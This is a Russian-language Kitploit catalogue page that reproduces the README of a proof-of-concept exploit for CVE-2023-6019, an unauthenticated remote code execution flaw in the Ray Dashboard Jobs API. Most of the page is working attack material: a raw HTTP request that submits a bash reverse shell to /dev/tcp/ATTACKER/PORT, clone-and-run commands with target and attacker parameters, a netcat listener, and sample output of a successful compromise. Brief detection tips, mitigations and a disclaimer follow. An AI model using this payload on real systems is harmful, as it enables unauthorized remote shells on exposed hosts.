Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-6019 — PoC exploit для CVE-2023-6019 - удаленное выполнение кода через неаутентифицированный Ray Dashboard Jobs API. | Kitploit
Инструменты/GitHubGitHub/joaquinrrr/cve-2023-6019
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubjoaquinrrr/cve-2023-6019

CVE-2023-6019

PoC exploit для CVE-2023-6019 - удаленное выполнение кода через неаутентифицированный Ray Dashboard Jobs API.

Репозиторий
62 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-6019 - Anyscale Ray Dashboard Неаутентифицированное RCE

PoC-эксплойт для CVE-2023-6019 — удаленное выполнение кода через неаутентифицированный API заданий Ray Dashboard.
Сделано oguiii


Описание

Anyscale Ray — это фреймворк с открытым исходным кодом для распределенных задач ML/AI. Версии до 2.6.4 предоставляют API для отправки заданий через Ray Dashboard (порт по умолчанию 8265) без какой-либо аутентификации, что позволяет неаутентифицированному атакующему отправлять произвольные задания и добиваться удаленного выполнения кода на хосте.

  • CVE: CVE-2023-6019
  • Серьезность: Критическая (CVSS 9.8)
  • Затронутые версии: Ray < 2.6.4
  • Исправлено в: Ray 2.6.4
  • Вектор атаки: Сеть (неаутентифицированный HTTP-запрос)

Как это работает

Конечная точка /api/jobs/ принимает JSON-полезную нагрузку с полем entrypoint, которое выполняется как команда оболочки процессом Ray worker — учетные данные не требуются.

root@kitploit:~
POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json

{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
  "runtime_env": {},
  "job_id": null,
  "metadata": {}
}

Использование

root@kitploit:~
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <TARGET_IP> -p <PORT> -l <LHOST> -lp <LPORT>

Аргументы

Пример

root@kitploit:~
# Запуск слушателя
nc -lvnp 4444

# Запуск эксплойта
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444

Ожидаемый вывод

root@kitploit:~
[*] Checking Ray version at 192.168.1.100:8265...
[*] Ray API version : 4
[*] Ray version     : 2.6.3
[+] VULNERABLE! Ray 2.6.3 is affected by CVE-2023-6019

[*] Target        : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submitting job...

[+] Job submitted successfully!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc

[>] Make sure your listener is ready:
    nc -lvnp 4444

Обнаружение

Ищите неожиданные POST-запросы к /api/jobs/ на порту 8265 в журналах HTTP или сетевом трафике.


Меры защиты

  • Обновитесь до Ray >= 2.6.4
  • Ограничьте доступ к порту Ray Dashboard (8265) с помощью правил брандмауэра
  • Не открывайте Ray Dashboard в публичных сетях

Ссылки

  • https://nvd.nist.gov/vuln/detail/CVE-2023-6019
  • https://www.anyscale.com/
  • https://github.com/ray-project/ray

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования на проникновение и образовательных целей.
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.
Всегда получайте соответствующее письменное разрешение перед тестированием.

Скачать инструмент
ФлагОписаниеПо умолчанию
-tIP-адрес или имя хоста целиобязательно
-pПорт Ray Dashboard8265
-lIP-адрес атакующего (реверс-шелл)обязательно
-lpПорт атакующего (реверс-шелл)обязательно